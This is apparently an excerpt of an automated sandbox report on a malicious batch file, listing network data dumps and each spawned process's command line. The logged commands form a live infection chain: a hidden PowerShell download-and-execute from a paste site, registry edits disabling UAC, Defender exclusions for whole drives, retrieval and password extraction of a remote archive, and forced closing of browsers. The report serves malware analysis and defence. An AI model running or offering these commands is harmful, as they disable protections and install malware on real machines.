                                                                                2024-12-30 10:40:28 UTC1378INData Raw: b1 37 de 8d ef 64 e8 af 55 ed e8 b9 5c 7e 63 bd e6 a9 6d 42 59 70 e2 d5 ee 7b 51 00 71 af 1d df c0 de 70 f4 ee fe 8b a9 75 3b dc 8f 68 7f 56 33 a1 e1 b7 de e9 2e fe f0 ec 3f 7c 6b bc 60 03 a9 87 5c e1 52 de dd 94 51 37 2d 14 f9 5e 92 69 9e 2a 36 ac 64 97 bc 28 80 99 a1 e6 81 3a b5 95 90 c3 d6 78 0d bb f5 53 2d 70 84 7a bf 26 a3 0c 8a 55 5a 8c d2 64 b1 92 4a 5c e3 d7 91 85 44 44 26 25 33 e7 21 6f 60 56 30 98 89 10 09 22 d6 76 0f fc 3d 75 af ba f4 e4 ed ef 4e 67 d4 00 91 12 a5 14 24 11 e2 d8 32 ed c4 85 96 90 3d 4a 9c 3f 94 69 df 07 7a d0 51 1f 5b bb 30 f9 c8 ce 87 e3 36 08 f9 da 3c 72 9a 7d af de 97 b2 97 46 ab 6e cc 45 04 9a 16 ba 37 80 0c ab cc 88 d9 1e 3e 85 2a 72 08 96 28 92 f7 ec 9a af 80 85 3d b3 74 e8 12 5f 1d 71 e6 ec 66 3d f5 49 c9 58 60 7b f1 9a
                                                                                Data Ascii: 7dU\~cmBYp{Qqpu;hV3.?|k`\RQ7-^i*6d(:xS-pz&UZdJ\DD&%3!o`V0"v=uNg$2=J?izQ[06<r}FnE7>*r(=t_qf=IX`{
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 5b f0 fc 06 28 83 45 29 09 8c 98 dc db 7e a0 db 13 93 bd d3 0f 3e 74 45 8a cb b5 b9 df 8f 71 37 25 fd 2f a9 a8 5d 86 83 54 d5 9b d2 dc f7 3c 71 44 75 31 dc 52 cf 80 13 a7 3f b0 ef 00 99 bf 1b 21 d5 de 3c c3 70 0d 68 d5 3a ee 08 16 20 3d 7c 43 6a fb 3d be c0 ac cf 8d 3d 1b 06 4f fc a8 f7 e8 32 87 fb 95 cf 8b 4e 73 6c d3 41 cc 9c ac c9 c4 6d 42 d7 d8 33 ec a1 39 b6 98 34 99 6f 7c 9e b1 0f b2 72 d0 f7 b6 53 66 c3 22 cf 4c c5 87 5d fe 49 a6 17 d4 01 e8 48 35 3c 01 dd fb fb db 86 20 e8 ad 68 7e b4 5d 6b 57 55 e7 a3 91 cf 30 82 62 b9 3c e1 53 9d 38 99 5d 03 e2 31 7a 4b ad a0 62 ed 0c 0f 00 c9 40 26 79 84 ec 4f e5 3b 80 50 45 60 6f 48 49 51 6f ff 47 6d 92 6f c9 aa c4 74 b9 fa 00 06 0e 24 e5 b0 52 17 3e 31 2a 7c b5 ea fa 23 92 9d 73 f6 e5 e9 a7 1b f8 85 f1 5f 78
                                                                                Data Ascii: [(E)~>tEq7%/]T<qDu1R?!<ph: =|Cj==O2NslAmB394o|rSf"L]IH5< h~]kWU0b<S8]1zKb@&yO;PE`oHIQoGmot$R>1*|#s_x
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: f0 9c 08 93 e0 25 91 22 fc 65 6e a3 d5 47 24 ce 68 2e 5e 82 63 a1 d1 ae 21 df e2 4e 6f 68 7b 9c 90 d4 3e 09 02 a9 8e d5 ba ae 30 3a 3b 2c da 5f 60 3c 43 d3 7f 0d 23 29 60 ad cf 30 22 21 8a 28 2f fb 3e 96 c6 b7 f2 fd a1 c5 ec c7 b4 a4 1d b5 f4 91 fa 4b 5d 0e 32 93 ed 19 37 64 bb 69 97 4d 69 ef 54 d2 c1 ac 89 e3 39 7a 97 e1 74 b5 e6 08 e4 fa 32 c1 dd 0c ac 9b c1 c0 0b c8 2b 4a 5f 13 cf 6e 64 fb e3 e7 24 9f 62 7d eb 70 f5 06 19 25 b5 d5 9b 9e b9 a8 96 37 69 46 77 ce 9b ff 68 82 a3 4f 70 67 07 80 29 43 a0 36 3f dc 94 8a 1c 3d 0e b2 09 e8 25 46 8b b2 63 8f 80 34 0d f8 71 70 bc 36 6e 08 b4 c9 2b 5d bc 93 7c f2 ab 7f 95 4b a5 ae c6 b0 c1 eb 92 50 25 ff 89 44 1b 18 a7 d6 0f d8 5f 44 6a 84 c7 df 85 83 2e 32 ae 48 7b 5f 6c 99 c7 aa 3f a0 0b 59 04 a4 ff 23 55 8e 1f
                                                                                Data Ascii: %"enG$h.^c!Noh{>0:;,_`<C#)`0"!(/>K]27diMiT9zt2+J_nd$b}p%7iFwhOpg)C6?=%Fc4qp6n+]|KP%D_Dj.2H{_l?Y#U


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" "
                                                                                Imagebase:0x7ff637190000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat"
                                                                                Imagebase:0x7ff637190000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:05:40:20
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
                                                                                Imagebase:0x7ff637190000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:05:40:23
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:05:40:23
                                                                                Start date:30/12/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
                                                                                Imagebase:0x7ff76e190000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:timeout /t 9
                                                                                Imagebase:0x7ff69e930000
                                                                                File size:32'768 bytes
                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:14
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:15
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:16
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:17
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff6eef20000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:18
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:19
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:20
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:22
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:23
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff76e190000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:25
                                                                                Start time:05:40:27
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:26
                                                                                Start time:05:40:27
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:27
                                                                                Start time:05:40:27
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:29
                                                                                Start time:05:40:31
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:32
                                                                                Start time:05:40:33
                                                                                Start date:30/12/2024
                                                                                Path:C:\Program Files\7-Zip\7z.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
                                                                                Imagebase:0xbb0000
                                                                                File size:557'056 bytes
                                                                                MD5 hash:9A1DD1D96481D61934DCC2D568971D06
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:33
                                                                                Start time:05:40:33
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:timeout /t 9
                                                                                Imagebase:0x7ff69e930000
                                                                                File size:32'768 bytes
                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:34
                                                                                Start time:05:40:33
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:35
                                                                                Start time:05:40:36
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:36
                                                                                Start time:05:40:38
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:37
                                                                                Start time:05:40:40
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:38
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM chrome.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:39
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM firefox.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:40
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM msedge.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:41
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM iexplore.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:42
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM opera.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:43
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM safari.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:44
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM brave.exe
                                                                                Imagebase:0x7ff77bcc0000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:45
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM vivaldi.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:46
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM epic.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:47
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM yandex.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:48
                                                                                Start time:05:40:44
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM tor.exe
                                                                                Imagebase:0x7ff713750000
